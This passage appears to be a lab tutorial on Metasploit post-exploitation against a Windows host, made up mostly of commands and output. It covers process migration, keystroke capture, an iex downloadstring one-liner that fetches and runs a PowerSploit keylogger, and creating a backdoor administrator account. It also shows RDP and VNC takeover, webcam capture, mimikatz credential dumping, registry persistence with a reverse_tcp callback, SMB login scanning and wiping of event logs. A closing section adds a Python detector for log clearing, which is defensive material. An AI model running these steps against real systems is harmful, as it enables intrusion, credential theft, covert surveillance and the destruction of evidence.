 2668  524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM
 2732  524   SearchIndexer.exe       x64   0        NT AUTHORITY\SYSTEM
 2828  1176  xmutGkHXf.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\xmutGkHXf.exe
 2840  1176  TeyQCXoY.exe            x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\TeyQCXoY.exe
 3020  1176  plKeHIXhzUQQ.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\plKeHIXhzUQQ.exe
 3220  1176  maBudFEovnC.exe         x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\maBudFEovnC.exe
 3384  1176  wLBliAR.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\wLBliAR.exe
 3456  2912  csrss.exe               x64   4        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 3748  816   audiodg.exe             x64   0
 3784  2732  SearchProtocolHost.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchProtocolHost.exe
 3944  2496  vmtoolsd.exe            x64   3                                      C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 4024  1176  dtUmbNlfMa.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\dtUmbNlfMa.exe
 4060  2912  winlogon.exe            x64   4        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe

meterpreter > getpid
Current pid: 1176
meterpreter >
```

winlogon.exe has PID 4060 and the current Meterpreter PID is 1176. Now bind to the process:

```
meterpreter > migrate 4060
[*] Migrating from 1176 to 4060...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 4060
meterpreter >
```

The migration succeeded and Meterpreter's PID is now that of the target process.

2. Capturing keystrokes

```
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter >
```

Now, at the victim machine's logon screen, type the password and log in. Then:

```
meterpreter > keyscan_dump
Dumping captured keystrokes...
admin
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter >
```

The victim's input "admin" was captured, so the password is "admin", followed by Enter.

- keylogrecorder

```
meterpreter > run keylogrecorder -h
[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
Keylogger Recorder Meterpreter Script
This script will start the Meterpreter Keylogger and save all keys
in a log file for later anlysis. To stop capture hit Ctrl-C
Usage:

OPTIONS:

    -c  Type of key capture. (0) for user key presses, (1) for winlogon credential capture, or (2) for no migration. Default is 2.
    -h  Help menu.
    -k  Kill old Process
    -l  Lock screen when capturing Winlogon credentials.
    -t  Time interval in seconds between recollection of keystrokes, default 30 seconds.

meterpreter > run keylogrecorder -c 0
[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
[*] explorer.exe Process found, migrating into 2764
[*] Migration Successful!!
[*] explorer.exe Process found, migrating into 928
meterpreter > run keylogrecorder -c 0
[!] Meterpreter scripts are deprecated. Try post/windows/capture/keylog_recorder.
[!] Example: run post/windows/capture/keylog_recorder OPTION=value [...]
meterpreter >
```

No keystrokes were captured this way. Fail.

- Get-Keystrokes

Download the PowerShell script https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1, upload it to the target, then run:

```
PS D:\> Import-Module .\Get-Keystrokes.ps1
PS D:\> Get-Keystrokes -LogPath c:\windows\temp\key.log
PS D:\>
```

All keystrokes are written to key.log.

Alternatively, run the following command:

```
PS D:\> iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-Keystrokes.ps1'); Get-Keystrokes -LogPath c:\windows\temp\key.log
```

## Adding a new user

- run getgui

```
meterpreter > run getgui -u xman666 -p admin
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*]     Adding User: xman666 with Password: admin
[-]     Account could not be created
[-]     Error:
[-]     命令成功完成。
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191012.2058.rc
meterpreter > shell
Process 4020 created.
Channel 54 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>net user xman666
net user xman666
用户名                 xman666
全名
注释
用户的注释
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2019/10/13 11:20:58
密码到期               2019/11/24 11:20:58
密码可更改             2019/10/13 11:20:58
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           All
登录脚本
用户配置文件
主目录
上次登录               从不

可允许的登录小时数     All

本地组成员             *Users
全局组成员             *None
命令成功完成。

C:\Windows\system32>
```

The user was created, but adding it to the Administrators group failed.

- Command line

```
meterpreter > shell
Process 2816 created.
Channel 52 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>net user
net user

\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest                    XinSai
xman666
命令运行完毕,但发生一个或多个错误。

C:\Windows\system32>net user test test /add
net user test test /add
命令成功完成。

C:\Windows\system32>net user
net user

\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest                    test
XinSai                   xman666
命令运行完毕,但发生一个或多个错误。
```

A user test with password test has been added. Check the user's details:

```
C:\Windows\system32>net user test
net user test
用户名                 test
全名
注释
用户的注释
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2019/10/13 11:11:32
密码到期               2019/11/24 11:11:32
密码可更改             2019/10/13 11:11:32
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           All
登录脚本
用户配置文件
主目录
上次登录               2019/10/13 11:12:03

可允许的登录小时数     All

本地组成员             *Users
全局组成员             *None
命令成功完成。

C:\Windows\system32>
```

The user belongs to the Users group only and is not an administrator. Add it to the administrators group:

```
C:\Windows\system32>net localgroup administrators test /add
net localgroup administrators test /add
命令成功完成。

C:\Windows\system32>net user test
net user test
用户名                 test
全名
注释
用户的注释
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2019/10/13 11:11:32
密码到期               2019/11/24 11:11:32
密码可更改             2019/10/13 11:11:32
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           All
登录脚本
用户配置文件
主目录
上次登录               2019/10/13 11:12:03

可允许的登录小时数     All

本地组成员             *Administrators       *Users
全局组成员             *None
命令成功完成。

C:\Windows\system32>
```

User test now belongs to both the Administrators and Users groups.

## Logging in remotely with the new user

1. Enable Remote Desktop (RDP)

```
meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20191012054909_default_192.168.8.129_host.windows.cle_038774.txt
meterpreter >
```

The following command achieves the same result:

```
meterpreter > run getgui -e
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     Terminal Services service is already set to auto
[*]     Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191012.5056.rc
meterpreter >
```

2. Check before logging in

Before connecting over RDP, check how long the victim user has been idle: a remote logon kicks the current user off, and the logon is also visibly announced on screen while it happens:

```
meterpreter > idletime
User has been idle for: 3 hours 48 mins 26 secs
meterpreter >
```

3. Connect to the target desktop with rdesktop

```
root@kali:~# rdesktop 192.168.1.8
Autoselected keyboard map en-us
Failed to negotiate protocol, retrying with plain RDP.
WARNING: Remote desktop does not support colour depth 24; falling back to 16
```

A GUI window pops up; enter the username/password to log in.

## Hiding the account

The newly added user is visible on the target's logon screen, so it needs to be hidden.

Skipped.

## Port forwarding

Below, port 3389 of the remote machine 192.168.1.8 is forwarded to local port 9833; connecting to local port 9833 then gives the same remote desktop.

```
meterpreter > portfwd add -l 9833 -r 192.168.1.8 -p 3389
[*] Local TCP relay created: :9833 <-> 192.168.1.8:3389
meterpreter >
```

The forward is up; now connect locally with rdesktop:

```
root@kali:~# rdesktop 127.0.0.1:9833
Autoselected keyboard map en-us
Failed to negotiate protocol, retrying with plain RDP.
WARNING: Remote desktop does not support colour depth 24; falling back to 16
root@kali:~#
```

The GUI window appears and the username/password logon succeeds.

## Screenshot

```
meterpreter > screenshot
Screenshot saved to: /root/aAKvRlgG.jpeg
meterpreter >
```

## Webcam

- List the webcams

```
webcam_list
```

- Take a photo with the chosen webcam

```
webcam_snap
```

- Stream live video from the chosen webcam

```
webcam_stream
```

## VNC control

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.6 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\QwdqufeOMpX.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.6:4545...
meterpreter > /usr/bin/vncviewer: VNC server closed connection
```

Not sure why this failed; testing shows the error appears when the victim machine is at the lock screen or a normal user is logged in.

When an administrator user is logged in, running the command again succeeds:

```
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.6 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\plKeHIXhzUQQ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.6:4545...
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
meterpreter > No authentication needed
Authentication successful
Desktop name "pc"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
```

A VNC window opens showing the victim's desktop.

## File operations

The usual commands cd, ls, cat, rm, mkdir and so on work inside Meterpreter.

- Upload a file

```
meterpreter > upload /root/flag.txt
[*] uploading  : /root/flag.txt -> flag.txt
[*] Uploaded 9.00 B of 9.00 B (100.0%): /root/flag.txt -> flag.txt
[*] uploaded   : /root/flag.txt -> flag.txt
meterpreter >
```

Use pwd to see the current directory, i.e. where the file was uploaded to.

- Run a file

```
meterpreter > execute -i -f cmd.exe
Process 1020 created.
Channel 40 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\>
```

For example, upload the mimikatz binary and run `execute -i -f mimikatz.exe` to get mimikatz's interactive prompt, then run the following commands to retrieve passwords:

```
privilege::debug
sekurlsa::logonpasswords
```

execute options:

> -f  the executable file to run
>
> -i  interact with the process
>
> -H  create a hidden process
>
> -a  arguments to pass to the command
>
> -m  execute from memory
>
> -s  execute the process in the given session
>
> -t  run the process with the currently impersonated thread token

- Download a file

```
meterpreter > download "c:\Windows\System32\drivers\etc\hosts"
[*] Downloading: c:\Windows\System32\drivers\etc\hosts -> hosts
[*] Downloaded 824.00 B of 824.00 B (100.0%): c:\Windows\System32\drivers\etc\hosts -> hosts
[*] download   : c:\Windows\System32\drivers\etc\hosts -> hosts
meterpreter >
```

## Persistence

- Startup folder

Generate a reverse-shell backdoor with msfvenom and place it in the following path on the target so that it runs at boot:

```
C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```

Then all we have to do is listen on the corresponding port.

- System service

```
meterpreter > run persistence -X -i 5 -p 8888 -r 192.168.1.6
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/PC_20191013.2138/PC_20191013.2138.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=8888
[*] Persistent agent script is 99669 bytes long
[+] Persistent Script written to C:\Windows\TEMP\OueYyJlRdu.vbs
[*] Executing script C:\Windows\TEMP\OueYyJlRdu.vbs
[+] Agent executed with PID 3776
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT
meterpreter >
```

persistence options:

> -X start at boot, -i reconnect interval, -r host to connect back to, -p port to connect back to

The agent connects back to 192.168.1.6 on port 8888 every 5 seconds:

```
root@kali:~# nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.8] 49195
```

It still works after the target machine reboots.

In a real engagement you would rather wait for the callback with a Metasploit handler:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/multi/handler
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.6:8888
[*] Sending stage (179779 bytes) to 192.168.1.8
[*] Meterpreter session 2 opened (192.168.1.6:8888 -> 192.168.1.8:49267) at 2019-10-13 01:05:56 -0400

meterpreter > getuid
Server username: PC\xman666
meterpreter >
```

**Persistence has to take antivirus and similar products into account; this step triggers an alert.**

## Lateral movement

Get the subnet information:

```
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
meterpreter >
```

Use a Metasploit module to find the servers on the LAN with port 3389 open:

```bash
use auxiliary/scanner/rdp/rdp_scanner
set rhosts 10.0.15.10-33
run
```

Scan for SMB logins:

```bash
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.0.15.10-33
set SMBUser administrator
set SMBPass 123456a?
run
```

- remotewinenum

Sometimes you cannot log in to another Windows machine over Remote Desktop directly. In that case the `Enter-PSSession` command opens a PowerShell session on the remote Windows machine; this requires the target to have port 5985 or 5986 open. By default, Windows Server 2008 and Windows Server 2012 enable the WinRM service automatically and thus expose port 5985 or 5986.

```
Enter-PSSession -computerName Server-R2
```

## Clearing traces

```
meterpreter > clearev
[*] Wiping 8202 records from Application...
[*] Wiping 23907 records from System...
[*] Wiping 8154 records from Security...
meterpreter >
```
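`clearev` leaves a trace of its own: Windows records the clearing itself, as event 1102 in the Security log ("The audit log was cleared") and as event 104 from Microsoft-Windows-Eventlog in the System log for every other channel ("The Application log file was cleared"). Three channels cleared within seconds of each other by NT AUTHORITY\SYSTEM, rather than one channel by an interactive administrator doing housekeeping, is the pattern to alert on. The following added example, which is not from the original post or from Metasploit, implements that check over constructed event records; the record fields, timestamps and subject names are assumptions made for the example.

```python
"""Flag event-log clearing of the kind `clearev` performs.

Added example for this page, not from the original post or from Metasploit.
Input is a constructed list of event records with the fields an exported
Windows event carries: channel, event id, time, message and subject account.
"""
from datetime import datetime

# (channel the record lives in, event id) -> channel that was cleared.
# None means the cleared channel is named in the message text.
CLEAR_EVENTS = {
    ("Security", 1102): "Security",  # "The audit log was cleared."
    ("System", 104): None,           # "The <channel> log file was cleared."
}


def find_log_clears(records):
    """Return (time, cleared_channel, subject) for every clearing event, sorted."""
    clears = []
    for r in records:
        key = (r["channel"], r["event_id"])
        if key not in CLEAR_EVENTS:
            continue
        channel = CLEAR_EVENTS[key]
        if channel is None:
            words = r["message"].split()  # "The Application log file was cleared."
            channel = words[1] if len(words) > 1 else "?"
        clears.append((datetime.fromisoformat(r["time"]), channel, r.get("subject", "")))
    return sorted(clears)


def clearing_bursts(records, window_s: int = 120):
    """Group clearing events that fall within window_s seconds of the first
    one in the group. Several channels wiped together (clearev clears
    Application, System and Security in one go) is the strong signal; a single
    clear may just be an administrator tidying up."""
    clears = find_log_clears(records)
    bursts, i = [], 0
    while i < len(clears):
        j = i
        while j + 1 < len(clears) and (clears[j + 1][0] - clears[i][0]).total_seconds() <= window_s:
            j += 1
        group = clears[i:j + 1]
        bursts.append({
            "start": group[0][0],
            "channels": sorted({c for _, c, _ in group}),
            "subjects": sorted({s for _, _, s in group}),
            "severity": "high" if len(group) > 1 else "low",
        })
        i = j + 1
    return bursts


# Constructed records: a normal logon, the three clears a clearev run leaves
# behind, and an unrelated service event afterwards.
SAMPLE = [
    {"channel": "Security", "event_id": 4624, "time": "2019-10-13T01:05:56",
     "message": "An account was successfully logged on.", "subject": "PC\\xman666"},
    {"channel": "System", "event_id": 104, "time": "2019-10-13T01:12:03",
     "message": "The Application log file was cleared.", "subject": "NT AUTHORITY\\SYSTEM"},
    {"channel": "System", "event_id": 104, "time": "2019-10-13T01:12:04",
     "message": "The System log file was cleared.", "subject": "NT AUTHORITY\\SYSTEM"},
    {"channel": "Security", "event_id": 1102, "time": "2019-10-13T01:12:05",
     "message": "The audit log was cleared.", "subject": "NT AUTHORITY\\SYSTEM"},
    {"channel": "System", "event_id": 7036, "time": "2019-10-13T01:13:00",
     "message": "The Print Spooler service entered the running state.", "subject": ""},
]

if __name__ == "__main__":
    for b in clearing_bursts(SAMPLE):
        print(f"{b['start']:%Y-%m-%d %H:%M:%S} severity={b['severity']} "
              f"channels={','.join(b['channels'])} by={','.join(b['subjects'])}")
```

Two practical notes: the 104/1102 records survive only in the log that was cleared last (each clear resets its own channel), so the real defence is forwarding events off the host to a collector before they can be wiped; and the subject of a 1102 being SYSTEM rather than a named administrator is itself worth a rule, since interactive log clearing is done by people, not by services.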